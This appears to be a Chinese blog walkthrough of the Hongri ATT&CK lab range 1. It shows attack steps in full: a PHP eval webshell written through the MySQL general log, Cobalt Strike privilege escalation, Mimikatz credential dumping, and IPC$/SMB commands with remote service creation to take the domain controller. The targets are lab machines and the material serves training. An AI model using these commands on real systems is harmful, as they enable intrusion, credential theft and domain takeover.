news 2026/7/5 2:35:12

红日靶场(ATTCK实战)1通关方法

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
红日靶场(ATTCK实战)1通关方法

概述

首先搭建虚拟机,配置ip和网段。在服务页面找到突破口,如信息收集中端口扫描和子域名搜索,弱密码爆破后进入后台。在开启日志中用sql语法写入webshell,并用蚁剑连接。拿下web服务机后进行内网信息收集,再将蚁剑转到CS控制(cs生成的payload用蚁剑上传并运行,成功连接),用cs自带的ms14-058提权成system。横向移动,用minikatz读取次web的账号密码,建立ipc管道,控制web服务器机把smb的木马,传给内网电脑,用流量转发的思想成功控制域控。

外网打点 → 内网渗透 → 横向移动 → 控制域控”,涵盖了以下核心知识点:

  • Web应用漏洞利用(弱口令 + MySQL日志写Shell)
  • 权限提升与C2框架联动(MS14-058提权 + 蚁剑转CS)
  • 内网信息收集与凭证窃取(Mimikatz抓密码)
  • 横向移动与域控拿下(IPC管道 + SMB横向 + 流量转发)

搭建

外网(vm3)

内网(vm4)

导入虚拟机----“我已复制”

(这里解释一下:想练习一下ip网段配置就点的"我已复制",以上操作与虚拟机中已经配好的相同,也可点"移动"。复制:启动虚拟机后可能会改变ip;移动:不会改变ip。通关2中点的"移动")

web服务器 win7(配ip地址)

外网ip

本地连接1

内网ip

本地连接5

关闭防火墙后 ping一下检查

加入虚拟机

web服务器、域控、域内主机 密码:hongrisec@2026账户:god\administrator

web渗透

web服务器中开启phpstudy

信息收集 如nmap扫描 御剑高速tcp端口扫描工具

phpstudy弱密码 root/root

进入后台:http://192.168.111.128/phpmyadmin/

先查看有没有开启日志:SHOW VARIABLES LIKE "general%"

开启日志:set global general_log = on

设置日志路径,绝对路径在探针里有的:SET GLOBAL general_log_file = "C:/phpStudy/WWW/lfr.php";

设置成功后写马:SELECT "<?php @eval($_POST['x']);?>"

蚁剑连接

内网渗透

内网信息收集

等等等。。。。。

关闭防火墙

当前控制的用户是god\administrator

当前控制的电脑加入了域,域名是god.org

域中有5个用户

。。。。。

蚁剑转CS控制

CS生成一个马,通过蚁剑上传到服务器,然后终端里执行即可

kali要和web服务器(win7)一个网段,vmware中设置成vmw3

用蚁剑上传木马,并用蚁剑运行

提权

ms14-058

横向移动(流量转发、拿域控)

用minikatz读取此web服务器(win7)的账号密码

administrator hongrisec@2026

beacon中输入:shell net use \\192.168.52.138\ipc$ "hongrisec@2026" /user:god\administrator

已建立ipc管道,进行远程控制

新开监听SMB,并新创建木马(tageless)

上传SMB_hongriweb1.exe

控制web服务器(win7),将此木马传给内网电脑

shell copy SMB_hongriweb1.exe \\192.168.52.138\C$

控制web服务器远程给138主机创建服务,执行SMB_木马

shell sc \\owa.god.org create test binpath= "cmd.exe /c c:\SMB_hongriweb1.exe

开启服务shell sc \\owa.god.org start test

连接目标机器link owa.god.org

成功!!!

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/5 2:34:38

少儿C++分级课程体系搭建:从L1到L4的教学设计经验分享

整理了一套适配不同年龄段认知节奏的C编程课程配套资料&#xff0c;覆盖从零基础入门到进阶提升的全阶段教学需求&#xff0c;今天把这套体系的设计思路和配套资源情况分享给各位同行和有自学需求的家长。 一、分级课程的设计逻辑 这套课程按照学习难度划分为L1到L4四个初级阶…

作者头像 李华
网站建设 2026/7/5 2:33:18

OpenClaw 的 sessions_spawn 隔离机制

核心概念 sessions_spawn 是 OpenClaw 的子 Agent 隔离启动接口。每次调用会创建一个全新的独立 Session&#xff0c;拥有自己独立的上下文窗口&#xff0c;不会继承父 Session 的对话历史。 sessions_spawn({task: "任务描述",runtime: "subagent",cont…

作者头像 李华
网站建设 2026/7/5 2:32:27

若依系统登录密码RSA加密实战:jsencrypt前端加密与Spring Boot后端解密

1. 项目概述与核心价值最近在重构一个基于若依框架的后台管理系统&#xff0c;登录模块的安全加固是首要任务。虽然若依本身提供了强大的权限和用户管理&#xff0c;但在默认配置下&#xff0c;登录时的密码传输仍然是明文或简单的MD5哈希&#xff0c;这在网络层面存在被截获的…

作者头像 李华
网站建设 2026/7/5 2:30:48

Go 数据结构 string 深度剖析

什么是 string 在 src/builtin/builtin.go 中这样定义&#xff1a; // string is the set of all strings of 8-bit bytes, conventionally but not // necessarily representing UTF-8-encoded text. A string may be empty, but // not nil. Values of string type are immut…

作者头像 李华
网站建设 2026/7/5 2:27:51

Docker--Docker Swarm集群

Docker Swarm 是docker原生集群管理系统&#xff0c;它将一个Docker主机池变成了一个虚拟主机&#xff0c;只需要使用简单的API就可以实现与Docker集群的通信。从Docker 1.12.0开始&#xff0c;Docker Swarm就内置于Docker引擎中了&#xff0c;不需要单独安装配置。节点架构swa…

作者头像 李华